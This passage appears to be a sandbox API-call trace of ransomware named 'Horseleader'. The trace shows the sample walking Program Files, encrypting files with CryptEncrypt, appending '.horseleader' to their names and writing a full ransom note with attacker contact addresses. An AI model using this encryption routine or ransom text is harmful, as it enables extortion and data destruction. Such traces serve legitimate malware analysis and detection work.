cAlternateFileName="")) returned 0x7c6860 [0250.632] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.632] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\.") returned 57 [0250.632] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.632] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.632] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.632] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\..") returned 58 [0250.632] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.632] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.632] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="10.0", cAlternateFileName="")) returned 1 [0250.632] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0250.632] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0") returned 60 [0250.632] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0250.632] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0250.632] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.632] GetProcessHeap () returned 0x780000 [0250.632] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.632] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*") returned 62 [0250.632] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0250.636] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.636] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\.") returned 62 [0250.636] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.636] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="..", cAlternateFileName="")) returned 1 [0250.636] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.636] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\..") returned 63 [0250.636] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.636] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.636] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="1033", cAlternateFileName="")) returned 1 [0250.636] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0250.636] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033") returned 65 [0250.636] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0250.636] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0250.636] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.636] GetProcessHeap () returned 0x780000 [0250.636] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.636] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*") returned 67 [0250.636] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe0caabca, dwReserved1=0xc621f464, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0250.637] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.637] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\.") returned 67 [0250.638] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.638] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe0caabca, dwReserved1=0xc621f464, cFileName="..", cAlternateFileName="")) returned 1 [0250.638] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.638] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\..") returned 68 [0250.638] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.638] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.638] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd5024ea0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x2760, dwReserved0=0xe0caabca, dwReserved1=0xc621f464, cFileName="VSTOInstallerUI.dll", cAlternateFileName="VSTOIN~1.DLL")) returned 1 [0250.638] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="Windows") returned -1 [0250.638] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 85 [0250.638] StrStrIW (lpFirst="VSTOInstallerUI.dll", lpSrch=".horseleader") returned 0x0 [0250.638] lstrcmpW (lpString1="VSTOInstallerUI.dll", lpString2="#Decrypt#.txt") returned 1 [0250.638] lstrcmpW (lpString1="VSTOInstallerUI.dll", lpString2="_uninstalling_.png") returned 1 [0250.638] lstrlenW (lpString=".testttjffg") returned 11 [0250.638] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll", lpSrch=".testttjffg") returned 0x0 [0250.638] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.638] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.638] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.639] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 85 [0250.639] StrStrW (lpFirst="VSTOInstallerUI.dll", lpSrch=".txt") returned 0x0 [0250.639] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=10080) returned 1 [0250.639] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x2760, lpOverlapped=0x0) returned 1 [0250.642] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd8a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.642] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x2760, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x2760, lpOverlapped=0x0) returned 1 [0250.642] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.642] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.642] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.643] CloseHandle (hObject=0x15c) returned 1 [0250.643] GetProcessHeap () returned 0x780000 [0250.643] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.643] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.horseleader") returned 97 [0250.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll.horseleader")) returned 1 [0250.644] GetProcessHeap () returned 0x780000 [0250.644] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.644] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0xe0caabca, dwReserved1=0xc621f464, cFileName="VSTOLoaderUI.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 1 [0250.644] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="Windows") returned -1 [0250.644] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 82 [0250.645] StrStrIW (lpFirst="VSTOLoaderUI.dll", lpSrch=".horseleader") returned 0x0 [0250.645] lstrcmpW (lpString1="VSTOLoaderUI.dll", lpString2="#Decrypt#.txt") returned 1 [0250.645] lstrcmpW (lpString1="VSTOLoaderUI.dll", lpString2="_uninstalling_.png") returned 1 [0250.645] lstrlenW (lpString=".testttjffg") returned 11 [0250.645] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll", lpSrch=".testttjffg") returned 0x0 [0250.645] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.645] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.645] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.647] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 82 [0250.647] StrStrW (lpFirst="VSTOLoaderUI.dll", lpSrch=".txt") returned 0x0 [0250.647] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=18264) returned 1 [0250.647] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x4758, lpOverlapped=0x0) returned 1 [0250.650] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb8a8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.650] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x4758, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x4758, lpOverlapped=0x0) returned 1 [0250.650] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.651] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.651] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.651] CloseHandle (hObject=0x15c) returned 1 [0250.651] GetProcessHeap () returned 0x780000 [0250.651] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.651] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.horseleader") returned 94 [0250.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll.horseleader")) returned 1 [0250.652] GetProcessHeap () returned 0x780000 [0250.652] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.652] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0xe0caabca, dwReserved1=0xc621f464, cFileName="VSTOLoaderUI.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 0 [0250.652] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0250.653] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\#Decrypt#.txt") returned 79 [0250.653] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.656] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0250.656] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0250.657] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.659] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0250.659] CloseHandle (hObject=0x1a4) returned 1 [0250.659] GetProcessHeap () returned 0x780000 [0250.659] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.659] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc251dc00, ftCreationTime.dwHighDateTime=0x1cab7c7, ftLastAccessTime.dwLowDateTime=0x5e4b68d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc251dc00, ftLastWriteTime.dwHighDateTime=0x1cab7c7, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="VSTOInstaller.config", cAlternateFileName="VSTOIN~1.CON")) returned 1 [0250.660] lstrcmpiW (lpString1="VSTOInstaller.config", lpString2="Windows") returned -1 [0250.660] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 81 [0250.660] StrStrIW (lpFirst="VSTOInstaller.config", lpSrch=".horseleader") returned 0x0 [0250.660] lstrcmpW (lpString1="VSTOInstaller.config", lpString2="#Decrypt#.txt") returned 1 [0250.660] lstrcmpW (lpString1="VSTOInstaller.config", lpString2="_uninstalling_.png") returned 1 [0250.660] lstrlenW (lpString=".testttjffg") returned 11 [0250.660] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config", lpSrch=".testttjffg") returned 0x0 [0250.660] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.660] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.660] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.662] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned 81 [0250.662] StrStrW (lpFirst="VSTOInstaller.config", lpSrch=".txt") returned 0x0 [0250.662] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=716) returned 1 [0250.662] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2cc, lpOverlapped=0x0) returned 1 [0250.665] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.665] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x32aeb7c, 